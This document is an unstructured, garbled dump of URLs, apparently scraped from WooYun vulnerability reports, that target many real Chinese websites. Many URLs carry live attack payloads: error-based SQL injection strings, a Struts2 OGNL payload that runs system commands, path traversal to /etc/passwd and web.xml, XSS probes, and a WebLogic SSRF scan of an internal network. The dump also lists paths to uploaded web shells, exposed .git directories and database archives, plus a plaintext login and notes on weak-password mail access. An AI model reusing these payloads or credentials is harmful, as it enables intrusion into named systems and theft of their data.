http://study.**.**.**.**/Course/dk_ViewCourse.aspx?c=B692AA9D7FEAD46E&Type=Stu&psIdH=646&cIdH=154 http://study.**.**.**.**/myPaper/ViewExerciseSel.aspx?ModuleID=162&rId=21 javascript://执行js代码"。 about:blank域。对用户是没有危害的,而搜狗浏览器执行的域则为当前域:se://bookmarks/ about:blank) http://mp.midea.com.cn/bsnems/engine_Engine_downEngine.do http://**.**.**.**/ http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://pianke.me/api/user/setaddre.php http://pianke.me/api/user/setaddre.php http://**.**.**.**/ http://**.**.**.**/info.do?para=viewmain&showType=08 http://**.**.**.**/public/mobile/ http://crm.haolyy.com http://fang.hualongxiang.com/find/2?phone=555-666-0606 http://**.**.**.**/articlesview.asp?id=1465 http://**.**.**.**/admin_spb/default.asp http://**.**.**.**/wen.asp?c_id=241&n_id=643 http://chinamrgl.com/admin http://www.snda.com http://www.sdo.com 
https://github.com/liutaihua/scripts/blob/21a118795c64cae8331a77625a493e6049e65fb9/analysis_tsdb.py http://**.**.**.**/,票友ERP管理系统 http://**.**.**.**/PiaoYou_root.aspx http://**.**.**.**/uc_server/ http://webgame.aipai.com/www/login.php www.446364606@qq.com www.137244652@qq.com http://mail.meitunmama.com/ http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/news.asp?typenumber=0001 http://**.**.**.**/ http://**.**.**.**/specimen.php?item=A http://**.**.**.**/ann_list.php?class=1 http://**.**.**.**/photos.php?class=3 http://**.**.**.**/actives.php?class=5 http://**.**.**.**/insu.php?class=9 https://user.meitun.com/user/findPassword http://www.crcare.com.hk/trad/service.asp?section=pi&pi_id=21 http://www.crcare.com.hk/admin/ http://qa.touzhu.cn http://**.**.**.**/search/ http://**.**.**.**/submit/logins/ http://**.**.**.**/jiaoguan/message_show.php?message_id=1009 http://www.xunlingol.com/new.php?id=6 http://www.91zjd.com/checkusername.aspx?name= http://**.**.**.** http://**.**.**.**/ReadLog.aspx http://**.**.**.**/UserList.aspx http://baoxian.jbwchina.com:80/ http://**.**.**.**/pic/login.asp username:hxzby password:hxzby+20141203 http://10.10.2.9/ http://**.**.**.**/detail.php?type=men&id=351 http://**.**.**.**/pc_index.do http://rz.cheyipai.com/ http://rz.cheyipai.com http://rms.crclogistics.com/login.aspx http://rms.crclogistics.com http://**.**.**.** http://**.**.**.**/FCKeditor/_samples/asp/sample01.asp x.asp/目录上传解析 http://**.**.**.**/admi/upLoadFile/file/test.asp/xiao.jpg http://mail.ganji.com http://**.**.**.**/publish/list.jsp?lmid=161 http://mail.lotour.com/index.php http://**.**.**.** http://wap.chinaiiss.com/do.php?ac=getnextarticle&do=touch&inajax=1&number=15&topid=4&vtype=touch http://www.ilvxing.com/User/login http://www.oray.com/activity/150903/ 
http://**.**.**.**/InviteBid/BidBulletin_Public.aspx?p=S20150930006;X201509300004 http://77.hqg.skymoons.com/ http://77.hqg.skymoons.com/HqgActive/detail?id=58294* http://77.hqg.skymoons.com/HqgActive/nlist?type=3* http://77.hqg.skymoons.com/index.php/Admin/loginApi post:un=AAA*&pw=bbb&t=1443934921168 http://77.hqg.skymoons.com/admin http://77.hqg.skymoons.com/Admin?inner=home&word=aa* www.cheyipai.com http://**.**.**.**),存在GET型注入一个。 https://221.228.210.168 http://baoxian.jbwchina.com:80/ http://bbs.yaolan.com/interface/getthread.php?flag=thread&digest=true&fid=24&ret_type=jsonp&callback=func http://www.anxin.com/activity/qixi/2015/?m=0.2637973097153008 http://**.**.**.**/ http://xwxx.sicnu.edu.cn/mail_login.asp http://202.115.194.62:8080/sy/ http://202.115.194.62:8080/sy/upfiles/news/aspx1.aspx http://phy.sicnu.edu.cn:8088 http://epress.sicnu.edu.cn/product_veiw.asp?id=73 http://www.ytkd168.com/root/ http://www.ytkd168.com/Service_search.asp?keyword=88952634&Submit=%26nbsp%3B%26nbsp%3B%26nbsp%3B%26nbsp%3B%EF%BF%BD%EF%BF%BD%D1%AF&select=all http://www.ytkd168.com/Query.asp?ID=%27%0D%0A&button=%26%23160%3B%26%23160%3B%26%23160%3B%26%23160%3B%B2%E9+%D1%AF http://www.ytkd168.com/ShowNews.asp?id=517 http://www.ytkd168.com/ShowNews.asp http://www.ytkd168.com/feedback.asp?type=%D3%A6%C6%B8&zw=%20%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 http://www.ytkd168.com/?button=%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 http://kia.cheyipai.com http://liantong.cheyipai.com/UserCenter/Login/Index http://hr.supcon.com/ http://hr.supcon.com/Admin/Home/LogOn http://hr.supcon.com http://**.**.**.**/job/Idiaoyan/ http://60.190.252.42:8888/Main.aspx http://60.190.252.42:9999/Main.aspx http://www.u591.com/ http://www.u591.com/sw/news.php?id=1634 http://www.u591.com/lw/news_list.php?TypeID=41 http://www.u591.com/tw/news_list.php?ntype=6 http://www.u591.com/newpay/index.php?game_id=2 http://www.ku25.com/common/check/get_pay_data.php?id=0 http://**.**.**.**/login.jsp 
url:http://manage.bnu.edu.cn/manager/html/ user:admin http://**.**.**.**/view/8b0f0d718e9951e79b892786.html?from=search。。 http://www.uimi.so/Contact.php?ID=93 http://www.ucsus.com/News.asp?Method=View&NewsID=170 http://hl.pay.joy.cn/search.htm?keyword=-1 http://pay.joy.cn/searchresultnew.aspx?keyword=1 http://**.**.**.**/ http://cms.niu.com/member/index.php?c=api&m=upload&name=shangchuanfujian&code=b11fAyoZfb9DRFMHgdjog+Rbj3lkTaofJ7al8FzXLZObtYBuNv6lpmbhv2wZ/pPh+8aN/wldQZ6jCdHGs7FlTQ http://cms.niu.com/member/uploadfile/201510/2b6290bc0b.php http://gt1406043.**.**.**.**:10000/ http://gs1402096.**.**.**.**:10000/ http://gt1504238.**.**.**.**:10000/ http://gt1504345.**.**.**.**:10000/ http://gt1501031.**.**.**.**:10000/ http://gt1312248.**.**.**.**:10000/ http://gt1401126.**.**.**.**:10000/ http://gt1502179.**.**.**.**:10000/ http://gt1508223.**.**.**.**:10000/ http://bbs.ebogame.com/rss.php?forumid=0&tagname= http://**.**.**.**/ewebeditor/ewebeditor.htm?id=body&style=popup shell:http://**.**.**.**/ewebeditor/uploadfile/20140914151317422.jspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/index.php?m=vote&c=index&a=lists&siteid=1 http://**.**.**.**/index.php?m=vote&c=index&a=lists&siteid=1%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x3a,0x3a,version%28%29%29%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://member.9978.cn/account/passedit https://www.irongbei.com/index/plistcondition=close&cycle=0&income=0&payment=0&status=0&type=0 
http://www.u88.com/.git/ http://adm.u88.com/test/admin_user http://lv.funshion.com/lv.funshion.com.tar.gz http://gt1406043.**.**.**.**:10000/ http://gs1402096.**.**.**.**:10000/ http://gt1504238.**.**.**.**:10000/ http://gt1504345.**.**.**.**:10000/ http://gt1501031.**.**.**.**:10000/ http://gt1312248.**.**.**.**:10000/ http://gt1401126.**.**.**.**:10000/ http://gt1502179.**.**.**.**:10000/ http://gt1508223.**.**.**.**:10000/ http://datacargo.ce-air.com/cgreport/ http://b2e.ceair.com/ http://www.dongfeng-nissan.com.cn/region/dongguan/news?newstype=NewsType_002 URL:http://**.**.**.**:81/gjjcx/gjjcx.aspx?grzh=5326210000001 http://wooyun.org/bugs/wooyun-2015-0134466 http://www.51piao.com/Ticket/TicketList.aspx?Name=123&Source=key http://**.**.**.**/newslist.aspx?keyword=12 http://www.yicai.com/news/2014/10/4032648.html http://**.**.**.**/cn/products/fixed-access/colligate-access/ua5000/ http://**.**.**.**/ http://cnc.carjob.com.cn/memRegCheckMessage.do?memEmail=0&flag=3 www.tangguow.cn http://e.lvmama.com/ebooking/login.do http://**.**.**.**/service/fee/zxkf.shtml http://www.uimi.so/News_list.php?BigID=29 http://www.uimi.so/Contact.php?ID=91 http://www.uimi.so/Service.php?ID=92 http://www.uimi.so/Product.php?BigID=2045 http://www.uimi.so/About.php?ID=87 http://arsenal.chinaiiss.com http://**.**.**.**/category.php?cid=4 http://**.**.**.**/index.php?action=show&id=346 http://**.**.**.**/ http://**.**.**.**/zhdj/partymenber/partymenberAction!ajaxView.action?id=25182cd3-a153-4eee-b15a-d8dd81d324cd http://t.jzt.58.com/orderInfo/orderList?orderType=3276&comm_pf=&channel=wx http://114.112.88.210/Login.aspx http://**.**.**.**/news/detail.php?newsID=25 http://**.**.**.**/tv/tv_list.php?cat=2 http://**.**.**.**/news/list.php?cat=1 http://**.**.**.**/magazine/maga_list.php?cat=1 http://**.**.**.**/news/tlist.php?type=2 http://**.**.**.**/photo/?id=340 http://**.**.**.**/tv/tv_detail.php?vid=154 http://**.**.**.**/photo/slider_photo.php?id=340 http://m.mobage.cn/ 
http://**.**.**.**//platform/app/register.php http://g.kvm.la/#q=%E2%80%9C%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89:K12%E4%B8%AD%E5%9B%BD%E4%B8%AD%E5%B0%8F%E5%AD%A6%E6%95%99%E8%82%B2%E6%95%99%E5%AD%A6%E7%BD%91%22&start=20 http://**.**.**.**/bugs/wooyun-2014-047711 http://**.**.**.**/bugs/wooyun-2014-050127 http://**.**.**.**/bugs/wooyun-2010-060202 http://www.qhdrc.com/ http://www.qhdrc.com/pmodi.php http://**.**.**.**/bugs/wooyun-2015-0116346 http://**.**.**.**/bugs/wooyun-2014-086704 http://ccs.midea.com.cn:8081/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.49:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://172.16.16.1/ http://172.16.16.2/ http://172.16.16.3/ http://172.16.16.8/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.8/ http://172.16.16.16/ http://172.16.16.17/ http://172.16.16.18/ http://172.16.16.19/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.19/ http://172.16.16.21/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.22/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.23/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.23/ http://172.16.16.24/ http://172.16.16.25/ http://172.16.16.26/ http://172.16.16.27/ http://172.16.16.29/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.29/ http://172.16.16.38/weblogic.uddi.client.structures.exception.XML_SoapException http://172.16.16.38/ http://**.**.**.**/wap/ http://**.**.**.**/listPage/page1.jsp?id=4bbzlotn-34xa-inss-6dox-5gcccrgvdoke http://112.126.83.148/install/install.php http://oa.hengansl.com/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2 http://**.**.**.**/info.php?id=6 http://**.**.**.**/showsuit.php?prg_id=1 http://**.**.**.**/news.php?sortid=111 http://**.**.**.**/knowledge.php?kid=686&group=111 
http://**.**.**.**/showhos.php?sortid=112&hos_id=1 http://**.**.**.**/showsuit.php?che_id=85 http://**.**.**.**:8980/phpMyAdmin/ http://account.niu.com http://**.**.**.**/gonggao_detail.asp?id=1341 http://**.**.**.**/analyse/baseinfo.asp?FileID=700 http://**.**.**.**/about.asp?id=11 http://www.anxin.com/cal/platforms_cal.aspx?q=* http://www.anxin.com/wiki/wikidetail.aspx?q=* http://www.anxin.com/activity/qixi/2015/?m=0.2637973097153008 http://zsk.chanjet.com/zice/index.php?content-app-category&catid=1 http://treistertest.chanjet.com http://**.**.**.**:8000/ViewBuilding.aspx?ldid=@@version http://**.**.**.**:8000/ViewBuilding.aspx?ldid=@@version http://**.**.**.**/web/guest/home?p_p_id=keyword_search&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&_keyword_search_struts_action=%2Fkeyword_search%2Fview http://**.**.**.**/bugs/wooyun-2015-0134524 http://www.iwatch365.com/watch/?px=6&desc=desc http://www.iwatch365.com/index.php?m=content&c=index&a=lists&catid=81&ids= http://www.iwatch365.com/forum.php http://mall.ciwong.com/fruit/GetAddress?_=0.9362385582644492&id=xxx http://marry.hualongxiang.com/orders/hotel http://**.**.**/ www.taicang.info2 http://house.taicang.info/list_zx.aspx?xwbt= http://house.taicang.info/lpxq.aspx?id=79 http://zhzw.jnu.edu.cn/ http://zhzw.jnu.edu.cn/zhzw/website/gw/purchaseDetail.php?id=25 http://zhzw.jnu.edu.cn/zhzw/website/hostel/admin/signin.html http://zhzw.jnu.edu.cn/zhzw/website/gw/purchaseDetail.php?id=25 http://htg.yundzh.com/htg.yundzh.com/ttch?version=8.20 unix:/opt/nginx/temp/proxy_temp/nginx.sock http://wap1.huawei.com/uaprof/HW_HUAWEI_Che1-CL10_1_20140801.xml http://www.spider.com.cn/newuserjquery.action?usertype=first010&id=310872&name=123&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%8C%BA®ion=%E9%BB%84%E6%B5%A6%E5%8C%BA&address=test&zip=200070&mobile=110&mainflag=checked&tel= http://oa1.yurun.com http://www.pywm.com.cn/success_case---index.html www.pywm.com.cn 
http://cec.fudan.edu.cn/courseIntroList.jsp?typeId=11 http://api.starapp.ifensi.com/admin.php/Appadmin/index http://appbg.xiaoma.com/mobile_users/84223/edit http://appbg.xiaoma.com/banners http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=28&&no=166 http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=28&&no=166 http://hnzz.vcomlive.com/edms/index.php http://havboss.vcomlive.com/nodeServlet?sysid=1 http://112.124.212.5/index.php/Counselor/index/wt_id/3 http://www.helloan.cn:80/ www.helloan.cn http://tj.medejob.com/jobseeker/stage/FAQ_Question.aspx?id=9 http://**.**.**.**/tips/2065 http://**.**.**.**/shebaokachaxun.asp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8080/help/ch_gb/---此处目录未受权 http://www.zzvcom.com/plant/news.html http://www.zzvcom.com/cms/interface.jsp?time=53&data={readfile:%27/A02/A02016/A02016001/list.json%27}&jsoncallback=jsonp1443599753605 http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/web.xml%27}&jsoncallback=jsonp1442909681355 http://elife.fudan.edu.cn/login.action http://mcrlad.fudan.edu.cn/gb2312/infoview.asp?id=189 http://dev.koyimall.com/mall/list.html?GC=GD00&OC=&ST=SCODE3&inc_mode=a&dep=&oc=good_buy_total&os=desc http://ie.sogou.com/open/doc/?id=2_13&title=sogouExplorer.downloads se-extension://域可以查看搜狗开放的所有api,在对象空间sogouExplorer下面 www.90.niu.com http://**.**.**.**/bugs/wooyun-2010-0123238前人洞而发。 http://**.**.**.**/sysTemplateWeb/AnswerPage.aspx?ArticleID=265 http://**.**.**.**/sysTemplateWeb/AnswerPage.aspx?ArticleID=265 http://**.**.**.**//sysTemplateWeb/AnswerPage.aspx?ArticleID=265 http://**.**.**.**//sysTemplateWeb/AnswerPage.aspx?ArticleID=265 https://**.**.**.**//entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204 mongodb://data.midea.com:10010 http://**.**.**.**/opac_two/right.jsp?classmark=A http://**.**.**.**/opac_two/search2/detailSerial.jsp?rec_ctrl_id=11 http://**.**.**.**/downdetailsaction.action http://**.**.**.**/manage/checkloginaction.action 
http://**.**.**.**/newcontent_fujian_Down.action http://**.**.**.**/manage/checkloginaction.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D{%27ipconfig%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%**.**.**.**.InputStreamReader%28%23b%29,%23d%3dnew%**.**.**.**.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://**.**.**.**/newcontent_fujian_Down.action?fi_url=../WEB-INF/web.xml&filename=web.xml http://www.xpchina.com/admin/admin_login.html www.xpchina.com http://www.xpchina.com http://www.dmzj.com/ http://url/hxweb/sub.aspx?type=1&code=0401 http://url/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx http://url/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F http://**.**.**.**:8003/gspt/login.do?method=logout http://chuangyiren.cn/.git/ mysql:host=localhost;dbname=ccihr http://**.**.**/post/list2.ftltype=0&pageNum=1&pageSize=20&isPost=0&keyword= http://**.**.**/home/index.jsp http://**.**.**/post/list2.ftltype=0&pageNum=1&pageSize=20&isPost=0&keyword= http://123.57.251.8:8081/ http://27.189.197.173:81/user/userlist.jsp http://www.benliwuyou.com/news/newsshow.jsp?id=20%20and%201%3d2 http://**.**.**.**/products/zhgl/23.html URL:http://**.**.**.**/include/vod.php?id=31 http://**.**.**.**/cyportal2.3/DownloadTemplateFile?operate=all http://**.**.**.**/cyportal//DownloadTemplateFile?operate=all ea5f:d1f6:7b69%15]:7001 a65d:cf2a:220d%17]:7001 a65d:cf2a:220d%17]:546 www.metlife.net.cn/admin/login http://www.metlife.net.cn/front/retrieve/retrievePwdPage www.class.cn http://m.in.lizhi.fm/home/index.jsp http://l.youku.com/v/ 
http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:ORCL http://120.hinews.cn http://222.216.227.168:7001/longtu/ http://222.216.227.168:7001/console/login/LoginForm.jsp http://222.216.227.168:7001/ma/ma3.jsp http://**.**.**.**/ http://m.lvmama.com/bullet/index.php?s=/Api/getBootAd&osVersion=4.1.2&lvversion=7.3.0&globalLatitude=22.617606&globalLongitude=114.047714&firstChannel=ANDROID&udid=A0000038518D0C&formate=json&secondChannel=QQ&lvkey=0f78b5b7a528020794c88dd056bdafe2&postkey=E4C7A73A47C046E9A63816DE99D513C4 http://qms.midea.com.cn/ http://qms.midea.com.cn/CE/default.aspx http://qms.midea.com.cn http://**.**.**.**:8080/cstykj/flex/comLogin.html http://112.65.177.6:81/ http://mp.midea.com.cn/bsnems/login_Login_login.do http://mp.midea.com.cn/bsnems/upload/apps/APP2014071445590674/images/70adab23-6d5d-46d2-97d4-3a163e99080e.jsp http://**.**.**.**/database.rar http://**.**.**.**/bugs/wooyun-2010-0122276 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 http://**.**.**.**/Channel/Company_Show.aspx?ID=9737 box.9ku.com/downloadapp.aspx?t= http://aobo.tcl.com/count/History.asp http://aobo.tcl.com/count/History.asp http://202.108.173.172:7001/console/login/LoginForm.jsp http://202.108.173.172:7001/ma/out.jsp http://**.**.**.**/admin/Include/SelectPic.asp?ChannelID=3&CurrPath=/upfiles http://**.**.**.**/admin/ad_login.asp http://t.suyun.58.com http://180.169.55.148/defaultroot/Logon!logon.action http://**.**.**.**/admin/ftb.imagegallery.aspx?rif=~/admin/upimage&cif=~/admin/upimage&ftb=free1 http://**.**.**.**/boss/Login.asp http://**.**.**.**/NewsInfo.asp?Action=Co&id=658 http://**.**.**.**/ http://**.**.**.**/test.php http://**.**.**.**/check.php http://mes.juneyaoair.com/mes/ http://mes.juneyaoair.com/mes/wkrequirement/preUpload.do?pkid=13541&billNo=ZL0092 
http://mes.juneyaoair.com/mes/wkrequirement/fileList.do?id=13541 http://gugong.228.com.cn/annual/sureOrder http://**.**.**.**/ http://**.**.**.**:8088 http://vip1.gaotime.com/info-weixinAdmin/accountQueryInfo.do jdbc:oracle:thin:@**.**.**.**:1521/jlgswt http://**.**.**.**/upload.php http://**.**.**.**/index.jsp http://ekp.joyu.com/login.jsp http://m.campsort.com/ http://fenxiao.lvmama.com/ http://m.lvmama.com/clutter/login.htm# http://flight.lvmama.com/findorder.php www.lvmama.com http://www.lvmama.com http://www.aiba.com:9200/_plugin/bigdesk/../../../../../../etc/passwd http://api.jpush.cn:8800/sendmsg/v2/sendmsg http://sdk2.zucp.net:8060/webservice.asmx/mt http://**.**.**.**/news/news_khsh.asp http://**.**.**.**/share.php?F_email=admin@**.**.**.**%27and%20%28select%201%20from%20%20%28select%20count%28*%29,concat%28%28select%20md5%283.1415%29%29,floor%28rand%280%29*2%29%29x%20from%20mail.user%20group%20by%20x%29a%29%23 http://**.**.**.**/.NetConfiguration/v2.0 http://**.**.**.**/ http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two url:http://**.**.**.**/tools.php http://mail.alltrust.com.cn/,用人名拼音和弱口令123123可获得一个有效账号liuyy,登陆后会提示修改密码,已修改为admin@123,登陆后可查看内部邮件,查看工资信息,查看福建分公司通讯录,泄露内部信息。 http://www.wooyun.org/bugs/wooyun-2015-0144049/trace/9671b7d2bd0f918b35bfda17ac05a9b5 http://en.ramos.com.cn/news.php?class_id=4 http://drops.wooyun.org/tools/4760 http://en.ramos.com.cn/news.php?class_id=4 https://119.145.14.30 www.joboto.com http://svn.sdust.edu.cn/ http://**.**.**.**/mjlmc.html http://**.**.**.**/ecspms/login.aspx(生产安全管理系统) android:name="com.jsmcc.ui.desktop.FloatWindowService android:name="com.jsmcc.ui.desktop.FloatWindowService android:name="com.ecmc.service.MessageService android:name="com.ecmc.service.MessageService url:mail.lvmama.com www.airkunming.com 
http://**.**.**.**/console http://**.**.**.**/cK/foot.jsp http://**.**.**.**/cK/foot.jsp http://**.**.**.** www.yejs.com.cn/yjll/article/id/52071.htm www.yejs.com.cn/yjll/article/id/52071 www.yejs.com.cn/yjll/article/id/52071 ftp://61.129.93.146 http://www.yxb.com/ http://www.e8088.com/user/product/chost/chostBuyAction!chostInfo.action?productId=ch2014062500009&idcId=30 http://**.**.**.**/PowerMatter.aspx?BMID=4 http://**.**.**.**/newsdetail.asp?id=1 http://bd.skymoons.com/ http://**.**.**.**/admin/ http://**.**.**.**/article_list.php?id=0 http://**.**.**.**/article_view.php?id=182 http://huodong.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml%3f&pn=0&subid=142 http://www.anshengcredit.com/about.php?id=35 http://www.anshengcredit.com/about.php?id=35 http://www.anshengcredit.com/about.php?id=35 url:http://203.161.4.58:8001,开启webdav扩展,目录可写,导致可getshell http://bj.gtja.com/bjhcg/shequ/main.asp http://bj.gtja.com/bjhcg/shequ/loginCheck.asp http://www.unibankmedia.com/system/login/loginforfile.jsp http://med.39.net:80/Information/DailyTip.aspx?qId=2342&v=135791&t=0&sQId=1418 http://202.104.30.215 http://blog.9666.cn/weblog/toEditWeblog.action?weblogId=2274992 http://**.**.**.**/Login.aspx http://www.qhdhr.com.cn/about.php?id=1 http://**.**.**.**/bugs/wooyun-2015-0143242 http://**.**.**.**/bugs/wooyun-2015-0143335 Email:zhangjingze@36kr.com www.1000new.com http://www.myjiangjun.com/ http://211.151.123.214/ http://oa.suntime2003.com/ http://58.68.237.248:8080/ http://58.68.237.248:8080/oss/code/config.ini http://refindex.csp.kuxun.cn/.git/config http://wechat.edaijia.cn/driverapi/sendSms.do&mobile=13012345678&serviceId=driver-wechat&sig=4a292bce798d79f22aceb10b0419bf98 http://h5.edaijia.cn http://**.**.**.**/examples/servlets/servlet/SessionExample http://www.class.cn/user/user_detail/?user_id=6284123 http://yuyin.baidu.com/bbs/question/newest http://www.wooyun.org/bugs/wooyun-2010-0104052 http://**.**.**/profile.phpspace_uid=218462633_ 
http://blog.chinaunix.net/xmlrpc.php?r=blog/index&uid=23100982 http://blog.chinaunix.net/site/expert.html这里找的 http://blog.chinaunix.net/uid/23458341.html http://blog.chinaunix.net/xmlrpc.php?r=blog/index&uid=23458341 http://treistertest.chanjet.com/card.aspx?RJMF=&UFIN=1 http://zx.39.net:80/anli/getdata.ashx?act=getaskarticlelist&label=双眼皮手术 http://oa.airchinapm.com:2001/yyoa/index.jsp http://m.zyql.cn/?m=android/scenic.scenicTypelist&scenicType=1 http://m.zyql.cn/?m=android/scenic.scenicZb&cityId= X-Frame-Options:DENY http://www.fusionskye.com/anli.php?pid=1%27 http://www.fusionskye.com/product_x.php?id=87%27 http://www.fusionskye.com/about_l.php?id=27%27 http://wooyun.org/bugs/wooyun-2015-0145328 http://mmlogdgw.ckmnjvk.bbsj.pw/view/2/?id=29,0.0736658 http://**.**.**.**/) http://opweb.youcai.ele.me http://opweb.youcai.ele.me/eleme.min-d00caa4cd6.js http://182.92.234.85/ http://emarketing.sina.com.cn/voice.php?t=3%20AND%203*2*1%3d6%20AND%20701%3d701 http://**.**.**.**/login.aspx https://**.**.**.** http://myaquila.stjohns.hk/ http://myaquila.stjohns.hk/uc_server IP:http://180.169.51.84/index.php?s=/Index/login.shtml http://180.169.51.166/nswebui.html http://benyouhui.it168.com貌似是个论坛,右上角登录接口,一开始发现登录是有限制的 http://**.**.**.**/view/list?type=notice http://**.**.**.**/login.jsp http://**.**.**.**/nchwhs/login.jsp http://home.tvos.skysrt.com/ http://home.tvos.skysrt.com:8086/ http://home.tvos.skysrt.com:8088/ http://60.247.79.29/ http://www.class.cn/course/course_detail2/?course_id=101683 http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=couponlist http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=createcoupon http://ilife.homelink.com.cn/aigou/index.php?c=index&a=detail_pic&id=10555 http://**.**.**.**/templates/ahlibs/jsp/hbsx3nav.jsp?id=1523&webcode=/ahlibs http://act.midea.com/jdprize/site/CI4/v2.php http://act.midea.com/jdprize/site/CI3/index.php/commiter/C_commiter/getList 
https://github.com/SimonLeaves/xmyeTest/blob/098a1c143cb32ba968d95460deb3cdb80a59ca32/xmyeTest/src/main/resource/web.properties jdbc:mysql://127.0.0.1:3306/eby_test?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://ebaoyangdev.mysql.rds.aliyuncs.com:3306/eby_stat?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true http://ebaoyang.cn/front/report/report?id=387【e保养】 http://ebaoyang.cn/front/report/report?id=3000 http://ebaoyang.cn/front/report/report?id=1234 http://ebaoyang.cn/front/report/report?id=1232 http://c.ebaoyang.cn/c/login?callback=/c/console/promt/my http://manage.ezucoo.com/erc/login.action http://passport.pptv.com/UI/Security/MiniLogin.aspx这个接口了,无验证码,无限制,用户名密码均明文传输,可以fuzzing http://**.**.**.**/config.php~ http://**.**.**.**/index.jsp http://**.**.**.** http://wooyun.org/bugs/wooyun-2015-0144505 http://m.zyql.cn/?m=android/order.scenicBook&id=64&tid=115,未过滤 http://**.**.**.**/List.aspx?id=468683857360 http://**.**.**.**/content.aspx?id=631933770236 www.winadd.cn http://www.winadd.cn http://**.**.**.**:8012/login.aspx http://**.**.**.**:8012 chuang.yicai.com/project?project_id=-1 https://github.com/shaovie/heracles/blob/f5fa8e5a1eab51ec76438dbd9656f27a0d9209db/tmp/sendmail.py#L103 https://www.rmbbox.com/login http://www.mech.hku.hk/index.php?tpl=page&id=3 http://www.mech.hku.hk/index.php?tpl=news&cid=1 http://www.mech.hku.hk/index.php?tpl=people&cid=1 http://www.mech.hku.hk/index.php?tpl=news&cid=1 http://www.mech.hku.hk/index.php?tpl=news&cid=1 http://**.**.**.**:7001/console/login/LoginForm.jsp http://spm.sugon.com/ http://wooyun.org/bugs/wooyun-2015-0109682的续集 http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**/ http://**.**.**.**/chi/project/project_mb.php?id=-1 http://**.**.**.**/houtai_admin/login.jsp http://**.**.**.**/wap/category.php?cat_id=16 
